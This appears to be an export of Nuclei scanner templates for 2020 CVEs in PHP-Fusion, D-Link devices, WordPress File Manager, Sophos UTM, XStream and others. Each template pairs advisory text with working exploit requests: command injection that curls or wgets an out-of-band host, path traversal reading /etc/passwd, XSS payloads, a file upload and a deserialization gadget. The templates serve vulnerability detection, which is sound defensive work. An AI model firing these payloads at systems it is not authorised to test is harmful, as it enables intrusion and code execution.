cwe-id: CWE-77\n epss-score: 0.95694\n epss-percentile: 0.99372\n cpe: cpe:2.3:a:php-fusion:php-fusion:9.03.50:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: php-fusion\n product: php-fusion\n tags: cve,cve2020,rce,php,packetstorm,phpfusion,php-fusion\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"infusion_db.php\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e1132de74fa5c19bd76445786a3e75c35af4754b177d7255fd1a8483fca7e5020221008e5612cad816e2750d77b7f4069ca0bc2ebad08c44f2c595b7e4d720e250fedd:922c64590222798bb761d5b6d8e72950", "hash": "0683b8a42a9711b39cdc7b27154fbefa", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081db" }, "name": "CVE-2020-25078.yaml", "content": "id: CVE-2020-25078\n\ninfo:\n name: D-Link DCS-2530L/DCS-2670L - Administrator Password Disclosure\n author: pikpikcu\n severity: high\n description: D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to an administrator password disclosure: the /config/getuser endpoint returns the administrator account name and password to unauthenticated remote requests.\n impact: |\n An attacker can obtain the administrator password, potentially leading to unauthorized access and control of the camera.\n remediation: |\n Update DCS-2530L devices to firmware 1.06.01 Hotfix or later and DCS-2670L devices to a release newer than 2.02, per D-Link announcement SAP10180 (referenced below).\n reference:\n - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10180\n - https://twitter.com/Dogonsecurity/status/1273251236167516161\n - https://nvd.nist.gov/vuln/detail/CVE-2020-25078\n - https://github.com/pen4uin/vulnerability-research-list\n - https://github.com/ArrestX/--POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-25078\n epss-score: 0.82526\n epss-percentile: 0.98323\n cpe: 
cpe:2.3:o:dlink:dcs-2530l_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dlink\n product: dcs-2530l_firmware\n tags: cve,cve2020,dlink\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/config/getuser?index=0\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"name=\"\n - \"pass=\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/plain\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210084f38f45a1ffb4405c2e1cfd16f202eebc502797887dbe432763b1e64c009b9b022100e56a60ccff7047ec803dae4041a98979a08ccf2ee8deffe36449ac5f234918bd:922c64590222798bb761d5b6d8e72950", "hash": "d34a6ae16a84c5f88fa5e9179b2aba65", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081dc" }, "name": "CVE-2020-25213.yaml", "content": "id: CVE-2020-25213\n\n# Uploaded file will be accessible at:-\n# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt\ninfo:\n name: WordPress File Manager Plugin - Remote Code Execution\n author: foulenzer\n severity: critical\n description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. 
The vulnerability allows unauthenticated remote attackers to upload .php files.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.\n remediation: |\n Update to the latest version of the WordPress File Manager Plugin to mitigate this vulnerability.\n reference:\n - https://plugins.trac.wordpress.org/changeset/2373068\n - https://github.com/w4fz5uck5/wp-file-manager-0day\n - https://nvd.nist.gov/vuln/detail/CVE-2020-25213\n - http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html\n - http://packetstormsecurity.com/files/171650/WordPress-File-Manager-6.9-Shell-Upload.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-25213\n cwe-id: CWE-434\n epss-score: 0.97381\n epss-percentile: 0.99899\n cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: webdesi9\n product: file_manager\n framework: wordpress\n tags: cve,cve2020,wordpress,rce,kev,fileupload,intrusive,packetstorm,webdesi9\n\nhttp:\n - raw:\n - |\n POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48\n\n --------------------------ca81ac1fececda48\n Content-Disposition: form-data; name=\"reqid\"\n\n 17457a1fe6959\n --------------------------ca81ac1fececda48\n Content-Disposition: form-data; name=\"cmd\"\n\n upload\n --------------------------ca81ac1fececda48\n Content-Disposition: form-data; name=\"target\"\n\n l1_Lw\n --------------------------ca81ac1fececda48\n Content-Disposition: form-data; name=\"mtime[]\"\n\n 1576045135\n --------------------------ca81ac1fececda48\n Content-Disposition: form-data; name=\"upload[]\"; filename=\"poc.txt\"\n Content-Type: text/plain\n\n poc-test\n 
--------------------------ca81ac1fececda48--\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - poc.txt\n - added\n condition: and\n\n - type: word\n part: header\n words:\n - application/json\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009764a3380b69d4ec8408e92d8ba889960fbf555098f4ec27add5b2b49a5a6f0e022100edd60e97f49ac3c83ab4d31e41a127aec179ded13d84394542e9ec386121fb1d:922c64590222798bb761d5b6d8e72950", "hash": "81649e77522331f2289158fe3dc296ed", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081dd" }, "name": "CVE-2020-25223.yaml", "content": "id: CVE-2020-25223\n\ninfo:\n name: Sophos UTM Preauth - Remote Code Execution\n author: gy741\n severity: critical\n description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.\n impact: |\n Successful exploitation of this vulnerability could lead to remote code execution, allowing attackers to take control of the affected system.\n remediation: |\n Apply the latest security patches provided by Sophos to mitigate the vulnerability.\n reference:\n - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223\n - https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223\n - https://nvd.nist.gov/vuln/detail/CVE-2020-25223\n - https://community.sophos.com/b/security-blog\n - https://cwe.mitre.org/data/definitions/78.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-25223\n cwe-id: CWE-78\n epss-score: 0.97508\n epss-percentile: 0.99981\n cpe: cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sophos\n product: unified_threat_management\n tags: cve,cve2020,sophos,rce,oast,unauth,kev\n\nhttp:\n - raw:\n - |\n POST /var HTTP/1.1\n Host: {{Hostname}}\n Accept: text/javascript, text/html, 
application/xml, text/xml, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n X-Requested-With: XMLHttpRequest\n X-Prototype-Version: 1.5.1.1\n Content-Type: application/json; charset=UTF-8\n Origin: {{BaseURL}}\n Connection: close\n Referer: {{BaseURL}}\n Sec-Fetch-Dest: empty\n Sec-Fetch-Mode: cors\n Sec-Fetch-Site: same-origin\n\n {\"objs\": [{\"FID\": \"init\"}], \"SID\": \"|wget http://{{interactsh-url}}|\", \"browser\": \"gecko_linux\", \"backend_version\": -1, \"loc\": \"\", \"_cookie\": null, \"wdebug\": 0, \"RID\": \"1629210675639_0.5000855117488202\", \"current_uuid\": \"\", \"ipv6\": true}\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a0047304502205dc1664f5c457024a05322ea4f90f1b555fa287fa88d891fdd22ab9f01254c6f022100a2775475c594fb68dc732630b5d0861715e7d2b5e50722a65a2206ffcd920929:922c64590222798bb761d5b6d8e72950", "hash": "82786e98a3304bb9e671ed0ec1a902e4", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081de" }, "name": "CVE-2020-25495.yaml", "content": "id: CVE-2020-25495\n\ninfo:\n name: Xinuo Openserver 5/6 - Cross-Site Scripting\n author: 0x_Akoko\n severity: medium\n description: Xinuo (formerly SCO) Openserver versions 5 and 6 allow remote attackers to inject arbitrary web script or HTML tags via the 'section' parameter and are vulnerable to reflected cross-site scripting.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts or steal sensitive information from users.\n remediation: |\n Apply the latest security patches or updates provided by Xinuo to fix the XSS vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/49300\n - https://github.com/Ramikan/Vulnerabilities/blob/master/SCO%20Openserver%20XSS%20%26%20HTML%20Injection%20vulnerability\n - http://packetstormsecurity.com/files/160634/SCO-Openserver-5.0.7-Cross-Site-Scripting.html\n - 
https://nvd.nist.gov/vuln/detail/CVE-2020-25495\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-25495\n cwe-id: CWE-79\n epss-score: 0.00176\n epss-percentile: 0.54822\n cpe: cpe:2.3:a:xinuos:openserver:5.0.7:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xinuos\n product: openserver\n tags: cve2020,cve,sco,xss,edb,packetstorm,intrusive,xinuos\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n -

    hello

    \n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100dab9da2a59ed710339783e84dbbc12f3cc1adb05a029a643e3c3037fa79634da0221008573313bc71495d933a0ad06e73c00e9060d06fd606de84cea42bd1be3ce68b5:922c64590222798bb761d5b6d8e72950", "hash": "66ec5161e271f4d2fdcdff170a83b95d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081df" }, "name": "CVE-2020-25506.yaml", "content": "id: CVE-2020-25506\n\ninfo:\n name: D-Link DNS-320 - Unauthenticated Remote Code Execution\n author: gy741\n severity: critical\n description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected device.\n remediation: |\n Apply the latest firmware update provided by D-Link to mitigate this vulnerability.\n reference:\n - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675\n - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-25506\n - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10183\n - https://www.dlink.com/en/security-bulletin/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-25506\n cwe-id: CWE-78\n epss-score: 0.97383\n epss-percentile: 0.99903\n cpe: cpe:2.3:o:dlink:dns-320_firmware:2.06b01:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: dlink\n product: dns-320_firmware\n tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev\nvariables:\n useragent: '{{rand_base(6)}}'\n\nhttp:\n - raw:\n - |\n POST /cgi-bin/system_mgr.cgi? 
HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'`\n - |\n POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n# digest: 4a0a004730450221008603407556f5d86d00fc35eb29d8dfabfafad112a165be5c7341165845aac25802204d9d3505889d5f2e6e0aaf6df6add1895a70a6f9ebfed6e2022cb1654f9e342f:922c64590222798bb761d5b6d8e72950", "hash": "a01fb7f17b609db207452589807b399f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081e0" }, "name": "CVE-2020-2551.yaml", "content": "id: CVE-2020-2551\n\ninfo:\n name: Oracle WebLogic Server - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: |\n Oracle WebLogic Server (Oracle Fusion Middleware, component: WLS Core Components) is susceptible to a remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. 
This easily exploitable vulnerability could allow unauthenticated attackers with network access via IIOP to compromise Oracle WebLogic Server.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches provided by Oracle to mitigate this vulnerability.\n reference:\n - https://github.com/hktalent/CVE-2020-2551\n - https://nvd.nist.gov/vuln/detail/CVE-2020-2551\n - https://www.oracle.com/security-alerts/cpujan2020.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-2551\n epss-score: 0.97491\n epss-percentile: 0.99973\n cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: oracle\n product: weblogic_server\n tags: cve2020,cve,oracle,weblogic,rce,unauth,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/console/login/LoginForm.jsp\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"10.3.6.0\"\n - \"12.1.3.0\"\n - \"12.2.1.3\"\n - \"12.2.1.4\"\n condition: or\n\n - type: word\n part: body\n words:\n - \"WebLogic\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202870c3b1ea333869c202cd0988502ae3b1582d4b38ce1c7db483240b803ea92502203c70ee8d4e58c93bdeb345eff7fe2b91ff4f7d767a012e2b2ff738febbddedf0:922c64590222798bb761d5b6d8e72950", "hash": "576cf74644ac5391835b8bcc75758da2", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081e1" }, "name": "CVE-2020-25540.yaml", "content": "id: CVE-2020-25540\n\ninfo:\n name: ThinkAdmin 6 - Local File Inclusion\n author: geeknik\n severity: high\n description: ThinkAdmin version 6 is affected by a local file inclusion vulnerability because an unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to 
unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.\n remediation: |\n Apply the latest patch or upgrade to a version that is not affected by the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/48812\n - https://github.com/zoujingli/ThinkAdmin/issues/244\n - https://wtfsec.org/posts/thinkadmin-v6-%E5%88%97%E7%9B%AE%E5%BD%95-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/\n - http://packetstormsecurity.com/files/159177/ThinkAdmin-6-Arbitrary-File-Read.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-25540\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-25540\n cwe-id: CWE-22\n epss-score: 0.96711\n epss-percentile: 0.99631\n cpe: cpe:2.3:a:thinkadmin:thinkadmin:6.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: thinkadmin\n product: thinkadmin\n tags: cve,cve2020,thinkadmin,lfi,edb,packetstorm,ctolog\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s'\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220351956c4076b5c945da78c1f7ca4b062470b1039145c21aafaaccaea5044b9db02207d554851aec1c74cc8061be5f627d90b05ec7fa28a738c86a1f391b4acf10174:922c64590222798bb761d5b6d8e72950", "hash": "c5acb04c4a6109f30cca06c449e4b79c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081e2" }, "name": "CVE-2020-25780.yaml", "content": "id: CVE-2020-25780\n\ninfo:\n name: Commvault CommCell - Local File Inclusion\n author: pdteam\n severity: high\n description: CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13 are vulnerable to local file inclusion because an attacker can view a log file can instead 
view a file outside of the log-files folder.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system.\n remediation: |\n Apply the latest security patches or updates provided by Commvault to fix the local file inclusion vulnerability.\n reference:\n - https://srcincite.io/blog/2021/11/22/unlocking-the-vault.html\n - http://kb.commvault.com/article/63264\n - https://nvd.nist.gov/vuln/detail/CVE-2020-25780\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-25780\n cwe-id: CWE-22\n epss-score: 0.04166\n epss-percentile: 0.92003\n cpe: cpe:2.3:a:commvault:commcell:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: commvault\n product: commcell\n tags: cve,cve2020,commvault,lfi\n\nhttp:\n - method: POST\n path:\n - \"http://{{Host}}:81/SearchSvc/CVSearchService.svc\"\n\n body: |\n \n \n \n \n c:/Windows/system.ini\n \n \n \n\n headers:\n Cookie: Login\n soapaction: http://tempuri.org/ICVSearchSvc/downLoadFile\n content-type: text/xml\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"downLoadFileResult\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009728b39a66e9d6ccd54fd30251759972397ef95674ba421b6c0c222ae0c22775022100f01f50ac834da9c53218a08bead765f946e867beaa00534cd26bf9d29b7e74d1:922c64590222798bb761d5b6d8e72950", "hash": "caf59fb916c1d56696973684296dd222", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081e3" }, "name": "CVE-2020-25864.yaml", "content": "id: CVE-2020-25864\n\ninfo:\n name: HashiCorp Consul/Consul Enterprise <=1.9.4 - Cross-Site Scripting\n author: c-sh0\n severity: medium\n description: |\n HashiCorp Consul and Consul Enterprise up to version 1.9.4 are vulnerable to cross-site scripting via the key-value (KV) raw mode.\n impact: |\n Successful 
exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected Consul/Consul Enterprise application.\n remediation: Fixed in 1.9.5, 1.8.10 and 1.7.14.\n reference:\n - https://discuss.hashicorp.com/t/hcsec-2021-07-consul-api-kv-endpoint-vulnerable-to-cross-site-scripting/23368\n - https://www.hashicorp.com/blog/category/consul\n - https://nvd.nist.gov/vuln/detail/CVE-2020-25864\n - https://security.gentoo.org/glsa/202208-09\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-25864\n cwe-id: CWE-79\n epss-score: 0.00324\n epss-percentile: 0.70154\n cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:*\n metadata:\n max-request: 2\n vendor: hashicorp\n product: consul\n tags: cve,cve2020,consul,xss,intrusive,hashicorp\n\nhttp:\n - raw:\n - |\n PUT {{BaseURL}}/v1/kv/{{randstr}} HTTP/1.1\n Host: {{Hostname}}\n\n \n - |\n GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - text/html\n\n - type: word\n part: body_2\n words:\n - \n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100bbb346c3a43f73c414eb6ed526792050eb465a32f0a28251cad292479212181c02206d6bd66c126ad94302fd362178e914dd5d99e7af5cec7deffc553e0699899b9a:922c64590222798bb761d5b6d8e72950", "hash": "c889b2db1780ef83c1141944e49adbe2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081e4" }, "name": "CVE-2020-26073.yaml", "content": "id: CVE-2020-26073\n\ninfo:\n name: Cisco SD-WAN vManage Software - Local File Inclusion\n author: madrobot\n severity: high\n description: |\n Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote 
attacker to gain access to sensitive information.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the affected system.\n remediation: |\n Apply the latest security patches provided by Cisco to fix the vulnerability.\n reference:\n - https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073\n classification:\n cve-id: CVE-2020-26073\n metadata:\n max-request: 1\n tags: cve,cve2020,cisco,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: status\n status:\n - 200\n\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n part: body\n# digest: 4a0a00473045022039766848e039513d1de75fa4526a5cd9bd3ee54b8e0204e824e5e3f2a4abd8340221008795b9f415bd03ded961e86016a7a3f2d3546ccc02c4aa1b9afaf7550bb1adbc:922c64590222798bb761d5b6d8e72950", "hash": "0daded9aeb0b5186d51711171bbaea47", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081e5" }, "name": "CVE-2020-26153.yaml", "content": "id: CVE-2020-26153\n\ninfo:\n name: Event Espresso Core-Reg 4.10.7.p - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n Event Espresso Core-Reg 4.10.7.p is vulnerable to cross-site scripting in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php and allows remote attackers to inject arbitrary web script or HTML via the page parameter.\n impact: |\n Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.\n remediation: |\n Upgrade to Event Espresso Core-Reg version 4.10.7.p or later to mitigate this vulnerability.\n reference:\n - 
https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/\n - https://github.com/eventespresso/event-espresso-core/compare/4.10.6.p...4.10.7.p\n - https://nvd.nist.gov/vuln/detail/CVE-2020-26153\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-26153\n cwe-id: CWE-79\n epss-score: 0.00127\n epss-percentile: 0.47114\n cpe: cpe:2.3:a:eventespresso:event_espresso:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: eventespresso\n product: event_espresso\n framework: wordpress\n tags: cve2020,cve,xss,wordpress,wp-plugin,eventespresso\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/event-espresso-core-reg/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Event Espresso'\n - 'Tested up to:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"/>'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100ae2a684b5e05ec99dd3247ebd3073b2e1492e47b631ea52607d7358c3183cfbf022100ece622cb3353e1a1d12f6e1f82cca55fcd1dea2de4dc325b2be673547060969f:922c64590222798bb761d5b6d8e72950", "hash": "513d22b409af7a3642d1fbc1e8790dbd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081e6" }, "name": "CVE-2020-26214.yaml", "content": "id: CVE-2020-26214\n\ninfo:\n name: Alerta < 8.1.0 - Authentication Bypass\n author: CasperGN,daffainfo\n severity: critical\n description: Alerta prior to version 8.1.0 is prone to authentication bypass when using LDAP as an authorization provider and the LDAP server accepts Unauthenticated Bind 
requests.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to Alerta.\n remediation: |\n Upgrade Alerta to version 8.1.0 or later to mitigate this vulnerability.\n reference:\n - https://github.com/advisories/GHSA-5hmm-x8q8-w5jh\n - https://tools.ietf.org/html/rfc4513#section-5.1.2\n - https://pypi.org/project/alerta-server/8.1.0/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-26214\n - https://github.com/alerta/alerta/commit/2bfa31779a4c9df2fa68fa4d0c5c909698c5ef65\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-26214\n cwe-id: CWE-287\n epss-score: 0.01546\n epss-percentile: 0.85739\n cpe: cpe:2.3:a:alerta_project:alerta:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: alerta_project\n product: alerta\n tags: cve,cve2020,alerta,auth-bypass,alerta_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/api/config'\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - compare_versions(version, '< 8.1.0')\n\n - type: word\n part: body\n words:\n - '\"alarm_model\"'\n - '\"actions\"'\n - '\"severity\"'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: version\n group: 1\n regex:\n - '\"name\": \"Alerta ([0-9.]+)\"'\n internal: true\n\n - type: regex\n group: 1\n regex:\n - '\"name\": \"Alerta ([0-9.]+)\"'\n# digest: 4a0a00473045022100e204bd9385cf6b58f653e6b232edefbe1ce420d88afa77870717ebc626d8a2ea022067167ad2a0440c6d8e17db9ad35d149a90e5b289ee02d11bcaf428a2b3af61cf:922c64590222798bb761d5b6d8e72950", "hash": "202a4f7dae34ddf0ea60d6c02a793aa5", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081e7" }, "name": "CVE-2020-26217.yaml", "content": "id: CVE-2020-26217\n\ninfo:\n name: XStream <1.4.14 - Remote Code Execution\n author: pwnhxl,vicrack\n severity: high\n description: |\n XStream before 1.4.14 is susceptible to remote 
code execution. An attacker can run arbitrary shell commands by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Users who rely on blocklists are affected.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: Fixed in 1.4.14.\n reference:\n - https://x-stream.github.io/CVE-2020-26217.html\n - https://github.com/x-stream/xstream/commit/0fec095d534126931c99fd38e9c6d41f5c685c1a\n - https://github.com/x-stream/xstream/security/advisories/GHSA-mw36-7c6c-q4q2\n - https://nvd.nist.gov/vuln/detail/cve-2020-26217\n - https://lists.apache.org/thread.html/r2de526726e7f4db4a7cb91b7355070779f51a84fd985c6529c2f4e9e@%3Cissues.activemq.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-26217\n cwe-id: CWE-78\n epss-score: 0.97384\n epss-percentile: 0.99904\n cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xstream_project\n product: xstream\n tags: cve,cve2020,xstream,deserialization,rce,oast,xstream_project\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n \n 0\n \n \n \n text/plain\n \n \n \n \n 0\n -1\n 1\n \n \n \n curl\n http://{{interactsh-url}}\n \n \n \n \n \n \n java.lang.ProcessBuilder\n start\n \n \n start\n \n \n \n KEYS\n \n \n \n 0\n 0\n 0\n \n \n false\n \n \n \n 0\n \n \n test\n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: curl\"\n# digest: 
